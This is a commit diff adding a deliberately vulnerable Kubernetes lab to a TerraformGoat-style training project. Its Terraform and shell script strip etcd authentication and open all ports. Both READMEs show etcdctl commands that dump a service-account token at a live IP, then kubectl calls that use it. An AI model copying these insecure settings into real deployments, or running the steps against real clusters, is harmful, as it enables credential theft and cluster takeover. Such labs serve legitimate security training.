Merge pull request #86 from leveryd/main

feat: add kubernets etcd unauth scenario

kubernets/etcd/unauth/README.md

@@ -0,0 +1,77 @@
+# kubernetes etcd unauth Vulnerable Environment
+
+English | [中文](./README_CN.md)
+
+## Description
+
+This is a scenario used to build the kubernetes etcd unauth vulnerability environment.
+
+After building the environment with Terraform, users can obtain api object resource on kubernetes cluster through the etcd unauth vulnerabilities.
+
+## Deployment Environment
+
+Execute the following command in the container
+
+```shell
+cd /TerraformGoat/kubernets/etcd/unauth
+```
+
+Configure Alibaba Cloud Access Credentials
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-beijing"
+```
+
+> You can create and view your AccessKey on the [AccessKey page](https://ram.console.aliyun.com/manage/ak) of the Alibaba Cloud console
+
+Deploy Vulnerable Environment
+
+```shell
+terraform init
+terraform apply
+```
+
+> When the terminal prompts `Enter a value:`, enter `yes`
+
+![img](../../../images/20220622-174141.jpg)
+
+After the environment is set up, You can see the etcd access address of the scenario at Outputs.
+
+## Vulnerability Utilization
+
+we can use "etcdctl" tool to read secrets on kubernets cluster.
+
+for example, get "deployment controller" token
+
+```shell
+➜  unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets
+...
+/registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+➜  unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token
+```
+
+then use "deployment controller" token to access kube-apiserver, such as query pod resources
+
+```shell
+➜  unauth git:(main) ✗  kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0
+GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A
+
+NAMESPACE     NAME                                              READY   STATUS    RESTARTS   AGE
+kube-system   coredns-5495dd7c88-kb7vh                          0/1     Pending   0          18m
+kube-system   coredns-5495dd7c88-lwkpr                          0/1     Pending   0          18m
+kube-system   kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz            1/1     Running   0          17m
+kube-system   kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz   1/1     Running   1          19m
+kube-system   kube-proxy-pgrtj                                  1/1     Running   0          18m
+kube-system   kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz            1/1     Running   1          19m
+```
+
+## Destroy the environment
+
+```shell
+terraform destroy
+```

kubernets/etcd/unauth/README_CN.md

@@ -0,0 +1,77 @@
+# kubernetes etcd 漏洞环境
+
+[English](./README.md) | 中文
+
+## 描述信息
+
+这是一个用于构建kubernetes etcd组件 未授权访问漏洞环境的靶场。
+
+使用 terraform 构建环境后，用户可以通过 etcd组件 未授权访问漏洞获取到 kubernetes中的api资源信息。
+
+## 环境搭建
+
+在容器中执行以下命令
+
+```shell
+cd /TerraformGoat/kubernets/etcd/unauth
+```
+
+配置阿里云访问凭证
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-beijing"
+```
+
+> 在阿里云控制台的 [AccessKey 页面](https://ram.console.aliyun.com/manage/ak) 可以创建和查看您的 AccessKey
+
+部署靶场
+
+```shell
+terraform init
+terraform apply
+```
+
+> 在终端提示 `Enter a value:` 时，输入 `yes` 即可
+
+![img](../../../images/20220622-174141.jpg)
+
+环境搭建完后，在 Outputs 处可以看到etcd的访问地址。
+
+## 漏洞利用
+
+在存在 未授权访问 漏洞的 etcd 上，我们可以利用 etcdctl工具 读取 kubernetes集群 的secrets数据。
+
+读取secrets数据,获取部署控制器token
+
+```shell
+➜  unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets
+...
+/registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+➜  unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token
+```
+
+利用token访问访问kube-apiserver，比如查询pod
+
+```shell
+➜  unauth git:(main) ✗  kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJkZXBsb3ltZW50LWNvbnRyb2xsZXItdG9rZW4ta2xidGoiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVwbG95bWVudC1jb250cm9sbGVyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMDEyM2U0M2YtYWY4NS00NTAxLWIyZDItNDUxNjc1ZWEzMTcyIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlcGxveW1lbnQtY29udHJvbGxlciJ9.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0
+GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A
+
+NAMESPACE     NAME                                              READY   STATUS    RESTARTS   AGE
+kube-system   coredns-5495dd7c88-kb7vh                          0/1     Pending   0          18m
+kube-system   coredns-5495dd7c88-lwkpr                          0/1     Pending   0          18m
+kube-system   kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz            1/1     Running   0          17m
+kube-system   kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz   1/1     Running   1          19m
+kube-system   kube-proxy-pgrtj                                  1/1     Running   0          18m
+kube-system   kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz            1/1     Running   1          19m
+```
+
+## 销毁环境
+
+```shell
+terraform destroy
+```

kubernets/etcd/unauth/main.tf

@@ -0,0 +1,82 @@
+resource "alicloud_instance" "instance" {
+  security_groups            = alicloud_security_group.group.*.id
+  instance_type              = data.alicloud_instance_types.types_ds.instance_types.0.id
+  image_id                   = "ubuntu_18_04_64_20G_alibase_20190624.vhd"
+  instance_name              = "huocorp_terraform_goat_instance"
+  vswitch_id                 = alicloud_vswitch.vswitch.id
+  system_disk_size           = 20
+  internet_max_bandwidth_out = 100
+  password                   = "Huoxian@123" // 虚拟机密码
+
+  provisioner "file" {
+    connection {
+      type     = "ssh"
+      host     = self.public_ip
+      user     = "root"
+      password = "Huoxian@123"
+      timeout  = "1h"
+    }
+
+    source      = "resource/kk"
+    destination = "/root/kk" // deploy_k8s.sh用来安装k8s
+  }
+
+  provisioner "remote-exec" {
+    connection {
+      type     = "ssh"
+      host     = self.public_ip
+      user     = "root"
+      password = "Huoxian@123"
+      timeout  = "1h"
+    }
+    script = "resource/deploy_k8s.sh"
+  }
+
+  depends_on = [
+    alicloud_security_group.group,
+    alicloud_vswitch.vswitch,
+  ]
+}
+
+resource "alicloud_security_group" "group" {
+  name   = "huocorp_terraform_goat_security_group"
+  vpc_id = alicloud_vpc.vpc.id
+  depends_on = [
+    alicloud_vpc.vpc
+  ]
+}
+
+resource "alicloud_security_group_rule" "allow_all_tcp" {
+  type              = "ingress"
+  ip_protocol       = "tcp"
+  nic_type          = "intranet"
+  policy            = "accept"
+  port_range        = "1/65535" // 允许访问所有端口
+  priority          = 1
+  security_group_id = alicloud_security_group.group.id
+  cidr_ip           = "0.0.0.0/0"
+  depends_on = [
+    alicloud_security_group.group
+  ]
+}
+
+resource "alicloud_vpc" "vpc" {
+  vpc_name   = "huocorp_terraform_goat_vpc"
+  cidr_block = "172.16.0.0/16"
+}
+
+resource "alicloud_vswitch" "vswitch" {
+  vpc_id       = alicloud_vpc.vpc.id
+  cidr_block   = "172.16.0.0/24"
+  zone_id      = "cn-beijing-h"
+  vswitch_name = "huocorp_terraform_goat_vswitch"
+  depends_on = [
+    alicloud_vpc.vpc
+  ]
+}
+
+// kubekey安装k8s集群，配置要求至少 2核4g
+data "alicloud_instance_types" "types_ds" {
+  cpu_core_count = 2
+  memory_size    = 4
+}

kubernets/etcd/unauth/outputs.tf

@@ -0,0 +1,4 @@
+output "etcd_unauth_lab_address_link" {
+  value       = "http://${alicloud_instance.instance.public_ip}:2379"
+  description = "etcd un-auth lab address link."
+}

kubernets/etcd/unauth/resource/deploy_k8s.sh

@@ -0,0 +1,59 @@
+#!/bin/bash
+function deploy_k8s(){
+  export KKZONE=cn
+
+  # /root/kk 已经通过terrraform provisioner拷贝主机
+  chmod 755 /root/kk
+
+  apt-get update -y
+  apt-get install -y conntrack ebtables socat
+
+  /root/kk create cluster --with-kubernetes v1.21.5 -y
+}
+
+# etcd没有任何身份认证
+function deploy_vuln_etcd1(){
+  # 备份
+  apiserver_config_path=/etc/kubernetes/manifests/kube-apiserver.yaml
+  etcd_config_path=/etc/etcd.env
+  command_path=/usr/local/bin/etcd
+
+  cp $apiserver_config_path /root/kube-apiserver.yaml
+  cp $etcd_config_path /root/etcd.env
+
+  # 删除tls配置
+  sed -i '/ETCD_TRUSTED_CA_FILE/d' $etcd_config_path
+  sed -i '/ETCD_CERT_FILE/d' $etcd_config_path
+  sed -i '/ETCD_KEY_FILE/d' $etcd_config_path
+  sed -i '/ETCD_CLIENT_CERT_AUTH/d' $etcd_config_path
+
+  # 修改https到http
+  # 执行两次，因为 ETCD_LISTEN_CLIENT_URLS=https://172.31.14.33:2379,https://127.0.0.1:2379
+  sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path
+  sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path
+
+  echo "[done] '$etcd_config_path' change"
+
+  # 重新启动etcd进程
+  export $(cat $etcd_config_path | grep -v '#' | xargs)
+
+  # echo "$command_path"
+  pkill -f "$command_path"
+  sleep 1
+  ps aux| grep "$command_path"
+  setsid $command_path &
+
+  echo "[done] 'etcd' restart"
+
+  # 修改配置,重新启动apiserver进程
+  sed -i '/--etcd-cafile/d' $apiserver_config_path
+  sed -i '/--etcd-certfile/d' $apiserver_config_path
+  sed -i '/--etcd-keyfile/d' $apiserver_config_path
+  sed -i 's/\(.*\)--etcd-servers=https:\(.*\):2379/\1--etcd-servers=http:\2:2379/' $apiserver_config_path
+
+  echo "[done] '$apiserver_config_path' change"
+}
+
+deploy_k8s
+echo "[done] 'k8s cluster' deploy" && sleep 60
+deploy_vuln_etcd1

kubernets/etcd/unauth/versions.tf

@@ -0,0 +1,13 @@
+terraform {
+  required_providers {
+    alicloud = {
+      source  = "aliyun/alicloud"
+      version = "1.163.0"
+    }
+  }
+}
+
+provider "alicloud" {
+  profile = "default"
+  region  = "cn-beijing"
+}